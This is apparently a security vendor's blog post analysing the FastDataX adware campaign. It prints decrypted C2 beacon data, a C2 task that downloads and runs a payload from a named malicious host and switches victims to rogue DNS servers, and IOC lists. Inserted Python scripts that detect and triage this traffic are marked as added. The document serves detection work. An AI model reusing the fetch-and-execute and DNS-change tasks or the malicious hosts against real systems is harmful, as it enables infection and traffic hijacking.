Back in our July blog on the FastDataX campaign, we shared some compelling research with our readers, and we were excited by the interest it created. A few more months of research later, we have more to share, including multiple infections observed through our Threat Protection System (TPS), together with the real data behind them.

The background: FastDataX was first seen and alerted on by Verint's TPS in June 2017, on networks under observation. It was linked to the previously investigated DNSChanger campaign through similarities in communication patterns, together with previously reported characteristics such as PowerShell scripts and BITS jobs.

The following CNC Behavioral Alerts screen shows the infected clients communicating with several FastDataX domains drawn from a predefined domain list.

CNC Behavioral Alerts screen

Each of the above alerts contains data sent from the infected client to one of the C2 domains of the FastDataX campaign.


Moving on to "executor_activity"

We saw several types of communication to the C2 servers, and every communication from an infected client to the C2 carries an encrypted "executor_activity" record. It includes properties of the infected client, such as OS type, whether the user is an admin, indications of running in a VM and the current DNS configuration, as well as data about the malware's activity on the victim:

  • The activity type reported, including whether the PE was installed or uninstalled and which persistence methods were used (BITS jobs or PowerShell)
  • Days elapsed since the infection
  • Total installation counts
  • Build, version, and so on

The following decrypted JSON payload is an in-the-wild capture of the posted data, sent daily by a Windows scheduled task:

Executor activity
{
  "executor_activity": {
    "activity_type": 32,
    "affiliate": "",
    "build": 228,
    "compilation_id": "6785398366757276059",
    "days_elapsed": 1,
    "dns": {
      "hosts_active": "[REDACTED DNS IP1]",
      "hosts_config": "[REDACTED DNS IP1];[REDACTED DNS IP2]"
    },
    "external_id": "0",
    "global_install_count": 1,
    "hardware_id": "2526771032423317035",
    "heur": {
      "age": "258",
      "fentropy": "4.33",
      "flags": "0",
      "ientropy": "2.65",
      "installed": "65",
      "newest": "1497916800",
      "oldest": "1442534400",
      "score": "2"
    },
    "install_count": 1,
    "installer_id": "3549873876208096856",
    "instance_id": "2429043188702154891",
    "is_admin": true,
    "major": 1,
    "minor": 1,
    "os_id": 1000,
    "process": "\\FastDataX\\fastdatax.exe",
    "process_type": 1,
    "product_name": "FastDataX",
    "publisher_id": "0",
    "register_date": "1497965194",
    "register_dsrc": "1",
    "report_id": "6775307447112491894",
    "screen_x": 1680,
    "screen_y": 1050,
    "service_pack": 0,
    "session_id": "123185999533423825",
    "status": true,
    "suspect_flags": 0,
    "suspect_group": "",
    "suspect_info": "",
    "tag": "",
    "tracker_id": "",
    "tracker_id64": "0",
    "user_time": 1498059948,
    "version": 16842980,
    "x64": true
  }
}

The following is a breakdown of the executor_activity record above. Breaking down the JSON-formatted data gave us deeper insight into the contents, breadth and complexity of the campaign:

  1. The DNS configuration under "dns": two values, the resolver the infected machine is actually using ("hosts_active") and the primary/secondary resolvers currently configured on the endpoint ("hosts_config").

  2. A reference to the process fastdatax.exe and its path under "process": "\\FastDataX\\fastdatax.exe"

  3. Properties that are often used as input to anti-VM checks and that can also serve other functions in an adware campaign, such as the screen size in pixels ("screen_x": 1680, "screen_y": 1050) and the several entropy values under "heur".

  4. Properties of the client system that help catalogue the machine among the many others in the botnet: "os_id": 1000, "x64": true, "is_admin": true
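To make a record like the one above usable in triage, here is an added Python example (not part of the original post, and not the malware's own code) that parses the decrypted beacon, converts the epoch timestamps, cross-checks days_elapsed against register_date and user_time, and unpacks the version field. The packing of version as major<<24 | minor<<16 | build is inferred from this one sample (16842980 decodes to 1.1.228, matching the separate major/minor/build fields) and is an assumption; the embedded input is the post's beacon, trimmed to the fields used here and with the DNS IPs still redacted.

```python
import json
from datetime import datetime, timezone

# Decrypted executor_activity beacon as shown in the post, trimmed to the
# fields used below; the DNS IPs stay redacted. Sample input for this example.
SAMPLE_BEACON = json.loads(r'''
{
  "executor_activity": {
    "activity_type": 32,
    "build": 228,
    "days_elapsed": 1,
    "dns": {
      "hosts_active": "[REDACTED DNS IP1]",
      "hosts_config": "[REDACTED DNS IP1];[REDACTED DNS IP2]"
    },
    "hardware_id": "2526771032423317035",
    "is_admin": true,
    "major": 1,
    "minor": 1,
    "os_id": 1000,
    "process": "\\FastDataX\\fastdatax.exe",
    "register_date": "1497965194",
    "user_time": 1498059948,
    "version": 16842980,
    "x64": true
  }
}
''')


def decode_version(version):
    """Split the packed version into (major, minor, build).

    ASSUMPTION: inferred from the captured sample, where
    16842980 == (1 << 24) | (1 << 16) | 228 matches major/minor/build.
    """
    return (version >> 24) & 0xFF, (version >> 16) & 0xFF, version & 0xFFFF


def epoch_to_iso(value):
    """Render a Unix epoch (int or numeric string) as a UTC timestamp."""
    ts = datetime.fromtimestamp(int(value), tz=timezone.utc)
    return ts.strftime("%Y-%m-%d %H:%M:%S UTC")


def summarize_beacon(beacon):
    """Extract the triage-relevant fields and flag inconsistencies."""
    ea = beacon["executor_activity"]
    major, minor, build = decode_version(ea["version"])
    registered = int(ea["register_date"])
    reported = int(ea["user_time"])
    findings = []

    # Internal consistency checks: a tampered or replayed beacon would fail these.
    if (major, minor, build) != (ea["major"], ea["minor"], ea["build"]):
        findings.append("packed version disagrees with major/minor/build fields")
    if (reported - registered) // 86400 != ea["days_elapsed"]:
        findings.append("days_elapsed does not match register_date/user_time")

    # Host-side indicators worth surfacing to the responder.
    if ea["process"].lower().endswith("\\fastdatax\\fastdatax.exe"):
        findings.append("beacon sent by %s" % ea["process"])
    if ea["is_admin"]:
        findings.append("malware runs with admin rights")

    return {
        "version": "%d.%d.%d" % (major, minor, build),
        "registered": epoch_to_iso(registered),
        "reported": epoch_to_iso(reported),
        "dns_active": ea["dns"]["hosts_active"].split(";"),
        "dns_configured": ea["dns"]["hosts_config"].split(";"),
        "hardware_id": ea["hardware_id"],
        "findings": findings,
    }


if __name__ == "__main__":
    for key, value in summarize_beacon(SAMPLE_BEACON).items():
        print("%-15s %s" % (key, value))
```

For the captured beacon the registration time resolves to 2017-06-20 13:26:34 UTC and the report time to the following day, which agrees with "days_elapsed": 1; hardware_id is the value to pivot on when correlating beacons from the same machine across C2 domains.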

The C2 servers (see the full list of IOCs below) received the data described above and, at first, responded only with "503 Service Temporarily Unavailable".

Then, interestingly, from the beginning of November 2017 onwards, we observed the C2 servers responding with actual tasks and redirections.


Check your BITS jobs – Could be Malware!

One of FastDataX's persistence methods (described in our previous blog) uses BITS (Background Intelligent Transfer Service) jobs, which generate the traffic to the C2 domains. The BITS jobs are created during installation (FastDataX.exe /in) and are set to run three times after every reboot: immediately following the reboot, 6 hours later, and then after another 7 hours.

When a job runs, it initiates communication to several domains from a predefined subset of the C2 domains (fastdatax*.info). The requests made by the BITS jobs carry the "executor_activity" data described above, and the responses redirect the client to download DLL files from another host, hausbauinfos[.]info, which is hosted on the same IP as the C2 servers.

pcap attached to the cnc traffic alert

In the above pcap screen capture, the downloaded files appear with a ".dat" extension and are fetched immediately by the infected clients from the redirected path. They are, however, actually DLL files:

hxxp://hausbauinfos[.]info/files/59/projectd.dat
hxxp://hausbauinfos[.]info/files/101/projectd.dat
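The two observable patterns in this traffic are the C2 host family (fastdatax*.info) and the payload path shape on the redirect target (/files/<n>/project?.dat on hausbauinfos.info). As an added example, not from the original post, the following Python applies both patterns to proxy log lines; the log format ("client method url status") and the lines themselves are constructed for this example, and the hostname regex is a generalisation of the IOC list below rather than a list taken from the malware.

```python
import re
from urllib.parse import urlparse

# C2 host family from the post's IOC list (fastdatax<suffix>.info).
C2_HOST_RE = re.compile(r"^fastdatax[a-z]*\.info$", re.I)
# Host that served the .dat payloads, and the path shape of those payloads
# (/files/59/projectd.dat, /files/101/projectd.dat, /files/59/projecte.dat).
PAYLOAD_HOST = "hausbauinfos.info"
PAYLOAD_PATH_RE = re.compile(r"^/files/\d+/project[a-z]\.dat$", re.I)

# Constructed proxy log lines for this example: "client method url status".
LOG_LINES = [
    "10.1.2.3 POST http://fastdataxify.info/ 503",
    "10.1.2.3 POST http://fastdataxcube.info/ 302",
    "10.1.2.3 GET http://hausbauinfos.info/files/59/projectd.dat 200",
    "10.1.2.3 GET http://hausbauinfos.info/index.html 200",
    "10.1.2.7 GET http://example.com/files/12/projectd.dat 200",
    "10.1.2.9 GET http://fastdata.example/ 200",
    "garbage line that does not parse",
]


def classify_url(url):
    """Return an IOC label when url matches FastDataX infrastructure, else None."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    if C2_HOST_RE.match(host):
        return "fastdatax-c2"
    if host == PAYLOAD_HOST and PAYLOAD_PATH_RE.match(parts.path):
        return "fastdatax-payload"
    if host == PAYLOAD_HOST:
        # Same host but an unfamiliar path: still worth a look, lower confidence.
        return "fastdatax-payload-host"
    return None


def scan_log(lines):
    """Return (client, label, url, status) for every line hitting an IOC."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4 or not fields[3].isdigit():
            continue  # skip malformed lines instead of aborting the scan
        client, _method, url, status = fields
        label = classify_url(url)
        if label:
            hits.append((client, label, url, int(status)))
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print("%s  %-22s %-3d %s" % (hit[0], hit[1], hit[3], hit[2]))
```

Note that a .dat path on an unrelated host does not match: the path pattern is only meaningful on the payload host, which keeps the rule from firing on ordinary downloads. A C2 hit with a 503 status is still a hit; the post shows the servers answering 503 for months before they started issuing tasks.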


Activity Tasks

During the installation of FastDataX, a scheduled task is set to run daily and communicate with another subset of the fastdatax*.info C2 domains. An encrypted response was received with the following tasks to perform:

  • Download an EXE file, which also appears with a .dat extension, from the host referred to in the previous redirection
  • Execute it and eventually delete the file
  • Change the DNS configuration to use rogue DNS servers

Task response

{
  "tasks": [
    {
      "id": "623289314434015000",
      "update_id": "0",
      "activity_id": "0",
      "version": "1",
      "execute_file": {
        "download_url": "http://hausbauinfos.info/files/59/projecte.dat",
        "download": 1,
        "execute": 1,
        "wait_exit": 1,
        "wait_timeout": 120,
        "delete": 1
      }
    },
    {
      "id": "523289314434015000",
      "update_id": "0",
      "activity_id": "0",
      "version": "1",
      "change_dns": {
        "primary_dns": "82.163.143.176",
        "secondary_dns": "82.163.142.178",
        "flush_dns": 1
      }
    }
  ]
}
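Added example, not from the original post: a Python triage routine that interprets a decrypted task response like the one above, rating execute_file tasks by their download/execute/delete flags and the host they pull from, and change_dns tasks by whether the pushed resolvers are on the organisation's own list. TRUSTED_RESOLVERS holds assumed placeholder addresses; the embedded task list is the response above, used here as sample input.

```python
import json
from ipaddress import ip_address
from urllib.parse import urlparse

# The decrypted task response from the post, embedded as sample input.
SAMPLE_TASKS = json.loads('''
{"tasks": [
  {"id": "623289314434015000", "update_id": "0", "activity_id": "0", "version": "1",
   "execute_file": {"download_url": "http://hausbauinfos.info/files/59/projecte.dat",
                    "download": 1, "execute": 1, "wait_exit": 1,
                    "wait_timeout": 120, "delete": 1}},
  {"id": "523289314434015000", "update_id": "0", "activity_id": "0", "version": "1",
   "change_dns": {"primary_dns": "82.163.143.176", "secondary_dns": "82.163.142.178",
                  "flush_dns": 1}}
]}
''')

# ASSUMPTION: the resolvers your organisation actually hands out (placeholders).
TRUSTED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
# Host seen serving FastDataX payloads in the post.
PAYLOAD_HOSTS = {"hausbauinfos.info"}


def interpret_task(task):
    """Return (task_id, kind, severity, description) for one task object."""
    task_id = task.get("id", "?")

    if "execute_file" in task:
        ef = task["execute_file"]
        url = ef.get("download_url", "")
        host = (urlparse(url).hostname or "").lower()
        actions = [k for k in ("download", "execute", "delete") if ef.get(k)]
        # Fetch-and-run is already bad; a known payload host makes it certain.
        severity = "high" if ef.get("execute") else "medium"
        if host in PAYLOAD_HOSTS:
            severity = "critical"
        desc = "%s %s (wait %ss for exit)" % (
            "/".join(actions) or "no-op", url, ef.get("wait_timeout", "?"))
        return task_id, "execute_file", severity, desc

    if "change_dns" in task:
        cd = task["change_dns"]
        servers = [s for s in (cd.get("primary_dns"), cd.get("secondary_dns")) if s]
        for s in servers:
            ip_address(s)  # raises ValueError on a malformed address
        rogue = [s for s in servers if s not in TRUSTED_RESOLVERS]
        severity = "critical" if rogue else "low"
        desc = "set resolvers to %s%s" % (
            ", ".join(servers), "; flush cache" if cd.get("flush_dns") else "")
        if rogue:
            desc += " (not trusted: %s)" % ", ".join(rogue)
        return task_id, "change_dns", severity, desc

    # Unknown task types are reported rather than silently dropped, so that a
    # new capability shipped by the operators is noticed.
    return task_id, "unknown", "info", "unrecognised task keys: %s" % sorted(task)


def triage(response):
    """Interpret every task in a decrypted response, in the order received."""
    return [interpret_task(t) for t in response.get("tasks", [])]


if __name__ == "__main__":
    for task_id, kind, severity, desc in triage(SAMPLE_TASKS):
        print("[%s] %s %s: %s" % (severity.upper(), kind, task_id, desc))
```

On the captured response both tasks come out critical: the first downloads, executes and deletes projecte.dat from the payload host, and the second replaces the client's resolvers with the two rogue addresses and flushes the cache so the change takes effect immediately.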


Rogue DNS

Shortly after, with the help of TPS Network Forensics, we saw the DNS change take place; the client then started sending its DNS queries to the rogue DNS server:

The infected client in our laboratory had the rogue DNS values in the Registry:

The change may be invisible to the infected user. DNS redirection through these servers could be used to serve adware, or to redirect some of the traffic to rogue sites for phishing and so on.

The diagram shows the interaction points and the different C2 roles throughout the campaign.


IOC lists:

The C2 server IP and domains:
81.171.14.67
hausbauinfos[.]info
fastdataxient[.]info
fastdataxify[.]info
fastdataxium[.]info
fastdataxcast[.]info
fastdataxfire[.]info
fastdataxfeed[.]info
fastdataxdigita[.]info
fastdataxstar[.]info
fastdataxcube[.]info
fastdataxster[.]info
fastdataxmage[.]info
fastdataxmancer[.]info
fastdataxmaven[.]info
fastdataxpro[.]info
fastdataxrunner[.]info
fastdataxace[.]info
astdataxopoly[.]info
fastdataxigy[.]info
fastdataxsage[.]info
fastdataxality[.]info
fastdataxate[.]info
fastdataxius[.]info
fastdataxize[.]info
fastdataxnik[.]info
fastdataxspace[.]info
fastdataxology[.]info
fastdataxspan[.]info
fastdataxtechnica[.]info
fastdataxizer[.]info
 
URLs:
hxxp://hausbauinfos[.]info/files/59/projectd.dat - DLL file
hxxp://hausbauinfos[.]info/files/59/projecte.dat - EXE file
hxxp://hausbauinfos[.]info/files/101/projectd.dat - DLL file
 
Rogue DNS IPs in use:
82.163.143.176
82.163.142.178

So there you have it: the latest findings from Verint's research team!

We hope you enjoyed reading our blog. If you have any questions, please feel free to contact us.